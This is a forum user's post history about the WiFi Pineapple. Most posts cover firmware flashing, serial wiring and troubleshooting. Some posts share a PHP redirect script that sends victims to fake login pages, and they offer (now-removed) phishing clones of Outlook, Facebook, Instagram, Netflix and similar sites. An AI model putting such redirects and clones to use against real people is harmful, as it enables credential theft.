Jump to content

TylerCPU

Active Members
  • Posts

    145
  • Joined

  • Last visited

Everything posted by TylerCPU

  1. I see. It makes since now. Sorry. I just couldn't figure it out why the rx and tx was mixed up. It must have been my adapter.
  2. Thanks. I don't know if I will create a mobile version of them. It took me a long time to just create hotmail, outlook, and instagram by hand for the desktop alone.
  3. If you followed my advanced phishing tutorial it should work just fine. Your redirect.php file seem to be ok. I retested my tutorial on my pineapple and it works just fine. If you are running the firmware version 2.7.5, get rid of it. It's only for Latest Development testing. Go back and reflash the pineapple to 2.7.0 which I am running and works fine on my pineapple. That is the current Latest Stable Version. Hope that helps.
  4. Sorry guys.I should have spotted it. Actually @wireless router your redirect.php file is wrong. Your missing $_SERVER['REQUEST_URI'];. I didn't notice it until I stumbled upon this forum. http://forums.hak5.org/index.php?/topic/28599-phishing-redirect-script-not-doing-its-job/ Your redirect.php file should look like this. <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")){ header('Location: example.html'); } require('error.php'); ?> That's what mine looks like. Hope that helps.
  5. That would be great. Thanks. You can do whatever you want. Link,embed,share.
  6. Did you try and clean out the computers cache using ccleaner? Browsers cache stuff and you need to clean it out. If you followed it step by step it should work. Did you try and do a clean flash of the pineapple? If not here are the video tutorials. 1. 2.
  7. I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed**
  8. Looks like you got some pineapple weirdness going on. First of all check out that the redirect.php file has the correct names for the files its pointing to. { header('Location: twitter.html'); In this example make sure twitter ends in .html or .htm depending on the html file for twitter. So if the file ends in .htm use .htm in the redirect.php file. Your redirect.php, error.php, and index.php files look ok so far. The best thing to do is to reflash the pineapple, and use ccleaner on all the computers. Clear out the browsers cache before trying the phishing pages. Also the twitter and facebook files from that download is very old. I created some new ones and more. netflix,outlook,hotmail,blogger,youtube,instagram, etc...... Have fun and use them responsibly. Link: redacted
  9. Is this a powered usb hub? The pineapple does not have enough power to power a usb hub with many things on it.
  10. If you need to reflash it from the ground up over serial. Original factory files and then flash the pineapple firmware. I got tutorials on that.
  11. It's not hard at all. You can check out my videos on how to setup ICS in ubuntu similar to backtrack, flashing it, and setting up a vpn. Security4plus I hope it helps.
  12. Wow. Thanks guys. I'm glad it helped you out coolgeek.
  13. From what you said it should work now. The wiki your looking at is wrong about the picture tx,rx on the pineapple. If you don't see anything in the terminal on boot(pineapple) just switch the rx and tx wiring only on the adapter(ttl uart serial). That should fix your problem. The communication between the computer and the pineapple is over serial using the terminal. The Ethernet connection is for transferring the rootfs and kernel to the pineapple using TFTP. TFTP is like FTP. It's just a simpler protocol.
  14. I did a tutorial on youtube on how to flash the pineapple over serial. I don't know if that will help. Question 1. Yes, only plug GND to GND and TX to RX, and RX to TX. NO voltage(VDD). Try to uninstall all Serial Port drivers. Then use this driver. http://www.silabs.com/Support%20Documents/Software/CP210x_VCP_Windows.zip It's for the silabs 2102 uart ttl at the hakshop. If you need the factoryfiles.tar files I can give you a copy. Just let me know. Also if you see no output in the terminal just switch the RX and TX on the adapter. Part 1. Part 2.
  15. Thank you so much. I really appreciate it. Great work on the rickroll module . You make it so easy. Your the best. Keep up the good work. :)
  16. I would like to ask permission to Monetize my video that includes your rickroll module. I have displayed in youtube the files of rainbow chicken man,rickroll, and others only to display that it works. I would like to know the permissions of these files themselves and where you got them from. I just want to be in the right. Thank you. youtube link:
  17. I have the original pineapple files for the Fon 2100 here. security-plus.co/fon2100--unlock--jasager_1.2.zip if that helps. I saved a lot of stuff. It paid off.
  18. I finally got it out. It took so much force! So does the color of the duck have anything to do with the design of the USB Rubber Ducky? Mine is orange.
  19. I tried everything. The sd card won't come out. I just got it today, out of the box. It's such a dumb question, but how do you get it out. I tried some force but I don't want to brake it. Help.
  20. YAY, -brianzimm has added support for the Sierra 598u and Huawei E398 in the latest firmware.
  21. Oh, I had this problem too. Just "cd .." it will take you to the root dir. Then "ls -la". Once you login via ssh you need to go one directory up, like I said. Hope this helps. :)
  22. OH, so thats what its for. Got it updated. Its so snappy switching pages. Sweet!!!! ME LOVE UPDATES.
  23. Hey, I can't update the pineapple to the 2.0 firmware. My md5sums is 319d30f8fbb31d6ee7d9cec25bd7f23f on the download, but when I upgrade in the pineapples web interface I get this, "Error, MD5Sum does not match!" Hu?
  24. You could try this http://www.codeweavers.com/compatibility/browse/name/?app_id=333. It will allow you to install winscp on a mac. You will have to buy it soon, its only a free trial.
×
×
  • Create New...